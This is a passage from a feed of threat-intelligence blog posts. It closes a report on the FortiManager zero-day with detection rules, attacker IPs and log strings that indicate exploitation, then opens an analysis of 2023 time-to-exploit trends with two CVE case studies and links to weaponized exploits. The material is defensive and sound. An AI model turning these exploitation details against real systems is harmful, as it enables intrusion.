class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Detection</span></h2> <h3><span style="vertical-align: baseline;">YARA-L</span></h3> <p>If you are a Google SecOps Enterprise+ customer, rules were released to the “<a href="https://www.googlecloudcommunity.com/gc/Community-Blog/Google-Security-Operations-Q2-2024-Feature-Roundup/ba-p/785520" rel="noopener nofollow noreferrer" target="_blank">Mandiant Intel Emerging Threats</a>” rule pack (within the <a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category" rel="noopener nofollow noreferrer" target="_blank">Windows Threats</a> group).</p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig8.max-1000x1000.png" alt="fortinet-zero-day-fig8"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Relevant Rules</span></h4> <ul> <li role="presentation"><code style="vertical-align: baseline;">Suspicious FortiManager Inbound and Outbound Connection</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and File Download</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and non-HTTPS Command and Control</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and HTTPS Command and Control</code></li> </ul> <h3><span style="vertical-align: baseline;">Other SIEMs</span></h3> <p><span style="vertical-align: baseline;">Develop searches against Fortiguard logs for the following relevant IOCs. In particular, the Malicious Fortinet Device ID should provide a high fidelity alert if triggered.</span></p> <p><span style="vertical-align: baseline;">Baseline and set thresholds for unique operations in the FortiManager logs. In particular, operations for “Add device” and “Modify device” may be rare enough for your organization to provide an actionable alert until this vulnerability can be patched.</span></p> <p><span style="vertical-align: baseline;">Similarly, baseline and set thresholds for the changes field in the FortiManager logs, and consider a higher sensitivity when the changes field includes the word ‘Unregistered’.</span></p> <p><span style="vertical-align: baseline;">Enumerate the Fortigate devices daily, and alert when a previously unseen device name is observed in the logs.</span><span style="vertical-align: baseline;"> </span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/fee4323cebb88f025586fd9f3e7d0de183fd536fad2312d4ccccdb21f2f7185f/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> of IOCs is available for registered users.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Network-Based IOCs</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">45.32.41.202</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.238.141.143</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">158.247.199.37</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">195.85.114.78</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">.tm</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive of config files</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9DCFAB171580B52DEAE8703157012674</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MD5 hash of </span><span style="font-style: italic; vertical-align: baseline;">unreg_devices.txt</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h3><span style="vertical-align: baseline;">Additional Keywords</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Keyword</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">FMG-VMTM23017412</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malicious Fortinet Device ID</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">msg="Unregistered device localhost add succeeded"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">changes="Edited device settings (SN FMG-VMTM23017412)"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">changes="Added unregistered device to unregistered table."</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0qsc137p@justdefinition.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Observed in subs.dat and subs.dat.tmp. This is a disposable email address created by the threat actor.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Purity Supreme</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Observed in subs.dat and subs.dat.tmp</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2>Acknowledgements</h2> <p>We would like to thank Nick Simonian and Ronnie Salomonsen for their contributions.</p> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> </div></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><strong>Webinar</strong></p> <p><em>Two authors of this blog post, Foti Castelan and Max Thauer, will be presenting <a href="https://www.brighttalk.com/webcast/7451/628990" rel="noopener" target="_blank">additional details and mitigation strategies</a> during a Nov. 6 webinar. Register now to learn more about this threat, and how to defend against it.</em></p> </td> </tr> </tbody> </table></div> </div> </div> </div></div></description><pubDate>Wed, 23 Oct 2024 20:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends</title><link>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</link><description><div class="block-paragraph_advanced"><p>Written by: Casey Charrier, Robert Weiner</p> <hr/></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig1.max-1000x1000.jpg" alt="TTE 2023 executive summary"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant analyzed 138 vulnerabilities that were disclosed in 2023 and that we tracked as exploited in the wild. Consistent with past analyses, the majority (97) of these vulnerabilities were exploited as zero-days (vulnerabilities exploited before patches are made available, excluding end-of-life technologies). Forty-one vulnerabilities were exploited as n-days (vulnerabilities first exploited after patches are available). While we have previously seen and continue to expect a growing use of zero-days over time, 2023 saw an even larger discrepancy grow between zero-day and n-day exploitation as zero-day exploitation outpaced n-day exploitation more heavily than we have previously observed.</span></p> <p><span style="vertical-align: baseline;">While our data is based on reliable observations, we note that the numbers are conservative estimates as we rely on the first reported exploitation of a vulnerability. Frequently, first exploitation dates are not publicly disclosed or are given vague timeframes (e.g., "mid-July" or "Q2 2023"), in which case we assume the latest plausible date. It is also likely that undiscovered exploitation has occurred. Therefore, actual times to exploit are almost certainly earlier than this data suggests.</span></p> <h2><span style="vertical-align: baseline;">Exploitation Timelines</span></h2> <h3><span style="vertical-align: baseline;">Time-to-Exploit</span></h3> <p><span style="vertical-align: baseline;">Time-to-exploit (TTE) is our metric for defining the average time taken to exploit a vulnerability before or after a patch is released. Historically, our analyses have seen reduced times-to-exploit year over year. Through 2018 to 2019, we observed an average TTE of 63 days. From 2020 to the start of 2021, that number decreased to 44 days. Then, across all of 2021 and 2022, the average observed TTE dropped further to 32 days, already half of our first tracked TTE starting in 2018. In 2023, we observed the largest drop in TTE thus far, with an average of just five days. This is less than a sixth of the previously observed TTE. </span></p> <p><span style="vertical-align: baseline;">Our average TTE excludes 15 total data points, including two n-days and 13 zero-days, that we identified as outliers from a standard deviation-based statistical analysis. Without the removal of these outlier TTEs, the average grows from five to 47.</span></p> <h3><span style="vertical-align: baseline;">Zero-Day vs. N-day Exploitation</span></h3> <p><span style="vertical-align: baseline;">Prior to 2023, we had observed steady ratios of n-days to zero-days, being 38:62 across 2021–2022 and 39:61 across 2020 into part of 2021. However, in 2023, this ratio shifted to 30:70, a notable departure from what we had observed previously. Given that </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-days-exploited-2022/"><span style="text-decoration: underline; vertical-align: baseline;">zero-day exploitation has risen steadily over the years</span></a><span style="vertical-align: baseline;">, the shifting ratio appears to be influenced more from the recent increase in zero-day usage and detection rather than a drop in n-day usage. It is also possible that actors had a larger number of successful attempts to exploit zero-days in 2023. Future data and analyses will show whether this is the start of a noticeable shift, or if 2023 is a one-off in this regard.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig2.max-1000x1000.jpg" alt="2023 zero-day vs. n-day exploitation"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">N-Day Exploitation</span></h3> <p><span style="vertical-align: baseline;">Consistent with our last analysis, we found that exploitation was most likely to occur within the first month of a patch being made available for an already disclosed vulnerability. Twelve percent (5) of n-days were exploited within one day, 29% (12) were exploited within one week, and over half (56%) were exploited within one month. In our last report, 25% of the n-day vulnerabilities were exploited after the six-month mark. In 2023, all but two (5%) n-days were exploited within six months.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/tte-2023-fig3.gif" alt="N-day exploitation timeline"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Disclosure to Exploit to Exploitation Timelines</span></h2> <p><span style="vertical-align: baseline;"> </span></p> <p><span style="vertical-align: baseline;">Of the analyzed vulnerabilities, 41 (30%) were first exploited after the vulnerability's public disclosure. This section will focus on this subset of vulnerabilities. While we have pursued analysis of associations between exploit availability and exploitation timelines, Mandiant has continued not to observe a correlation between the two. It may be common to assume a relationship between the two data points; however, our longer-term analysis shows a distinct lack of association.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig4.max-1000x1000.jpg" alt="First exploit release prior to exploitation vs. after exploitation"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For vulnerabilities with exploits available prior to exploitation, we observed a median of 7 days from the date of disclosure (DoD) to the first public exploit release, and a median of 30 days from the exploit's release date to the date of first known exploitation. The median time from disclosure to exploitation of these vulnerabilities was 43 days.</span></p> <p><span style="vertical-align: baseline;">For vulnerabilities with exploits first made available after exploitation, we observed a median time of 15 days from disclosure to exploitation. The median time from exploitation to a publicly available exploit was observed to be four days, with a median timeline from disclosure to exploit release being observed as 23 days.</span></p> <p><span style="vertical-align: baseline;">These statistics are consistent with our past analyses, which have expressed non-deterministic outcomes regarding the influence of existing exploits on in-the-wild exploitation. We continue to find this true while also noting that there are other factors that affect the exploitation timeline of a given vulnerability. Potential factors include, but are not limited to, exploitation value and exploitation difficulty. To highlight one of these factors, we note that of the vulnerabilities disclosed in 2023 that received media coverage, 58% are not known to be exploited in the wild, and for those with at least one public proof of concept (PoC) or exploit, 72% are not known to be exploited in the wild. The following are two specific examples we observed that demonstrate the variance in how much of an effect an exploit's release can have on the time to in-the-wild exploitation, and that illustrate other potential influences in exploitation.</span></p> <h3><span style="vertical-align: baseline;">CVE-2023-28121 Use Case</span></h3> <p><a href="https://advantage.mandiant.com/vulnerabilities/vulnerability--a25bb57d-7c99-57b8-958c-86c63065627f" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-28121</span></a><span style="vertical-align: baseline;"> is an improper authentication vulnerability affecting the WooCommerce Payments plugin for WordPress. This vulnerability was disclosed on March 23, 2023, and did not receive its first proof of concept or even technical details until three and a half months later on July 3, when a blog was posted outlining how to create an Administrator user without prior authentication. This was followed quickly by a Metasploit module being released on July 4 with the ability to scan for the vulnerability and exploit it to create a new Administrator user. No exploitation activity was seen immediately following the release of this PoC or Metasploit module. Instead, exploitation activity is first known to have begun on July 14, soon after </span><a href="https://github.com/im-hanzou/Mass-CVE-2023-28121" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">another weaponized exploit</span></a><span style="vertical-align: baseline;"> was released. This exploit was first released July 11, with an upgraded version then released on July 13. Both versions of this exploit have the capability to exploit an arbitrary number of vulnerable systems in order to create a new Administrator user. Wordfence later </span><a href="https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> that the exploitation campaign began on July 14 and activity peaked on July 16 with 1.3 million attacks observed on that day alone. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig5.max-1000x1000.jpg" alt="CVE-2023-28121 timeline"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This vulnerability's timeline highlights a period of over three months where exploitation did not occur following disclosure; however, large-scale exploitation began 10 days after the first exploit was released and only three days after a second exploit with mass-exploitation capabilities was released. In this case, we can see that there is likely an increased motivation for a threat actor to exploit this vulnerability due to a functional, large-scale, and reliable exploit being made publicly available.</span></p> <h3><span style="vertical-align: baseline;">CVE-2023-27997 Use Case</span></h3> <p><a href="https://advantage.mandiant.com/vulnerabilities/vulnerability--ade68481-1a84-51d5-a027-318334b4ed8c" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-27997</span></a><span style="vertical-align: baseline;">, also known as XORtigate, is a heap-based buffer overflow in the Secure Sockets Layer (SSL) / virtual private network (VPN) component of Fortinet FortiOS. This vulnerability was disclosed on June 11, 2023, and immediately received significant media attention, being named XORtigate prior to Fortinet even releasing their official security advisory on June 12. The disclosure was quickly followed on June 13 with two blog posts containing PoCs, and one since-deleted non-weaponized exploit on GitHub. By June 16, </span><a href="https://labs.watchtowr.com/xortigate-or-cve-2023-27997/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">proof-of-concept code</span></a><span style="vertical-align: baseline;">, </span><a href="https://github.com/BishopFox/CVE-2023-27997-check" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">scanners</span></a><span style="vertical-align: baseline;">, and </span><a href="https://github.com/rio128128/CVE-2023-27997-POC/blob/main/CVE-2023-27997.py" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">weaponized exploit code</span></a><span style="vertical-align: baseline;"> were all publicly available. While exploitation could be expected to swiftly follow the immediate attention and exploits released, it was not until around four months after disclosure, on Sept. 12, that Mandiant first observed exploitation activity. Exploitation of this vulnerability is only known by Mandiant to be performed in relatively limited and targeted campaigns. In this case, we see that public interest and exploit availability did not appear to impact the timeline of exploitation.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig6.max-1000x1000.jpg" alt="CVE-2023-27997 timeline"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Use Case Comparison</span></h3> <p><span style="vertical-align: baseline;">One of the most likely reasons for the difference in observed timelines we see here is the difference in the reliability and ease of exploitation between the two vulnerabilities. CVE-2023-28121, which was exploited soon after exploits became available, is quite simple to exploit, requiring just one specific HTTP header to be set on an otherwise normally formatted web request. This makes large-scale and automated exploitation campaigns more plausible. On the other hand, CVE-2023-27997 requires exploiting a heap-based buffer overflow against systems which typically have several standard and non-standard protections, including data execution prevention (DEP) and address space layout randomization (ASLR), as well as navigating the logic of a custom hashing and XORing mechanism. When considering the multiple complexities involved in addition to the fact that targeted systems would likely already have multiple mitigations in place, we can see how much less time-efficient and reliable exploitation of this vulnerability would be.</span></p> <p><span style="vertical-align: baseline;">The other potential factor we identified is the difference in the value provided to an attacker by exploiting the affected products. FortiOS is a security-focused product that is typically deployed, oftentimes with significant privileges, within highly sensitive environments. Therefore, exploitation of CVE-2023-27997 could provide an attacker with those same privileges, furthering the potential damage an attacker could cause. WooCommerce Payments is one of the most popular WordPress plugins, and exploitation of CVE-2023-28121 can lead to complete access of the underlying web server that the plugin is running on. However, these web servers typically exist within demilitarized zones (DMZs) or other low-privileged network segments and thus present limited value to an attacker looking to exploit the larger organization that the plugin runs 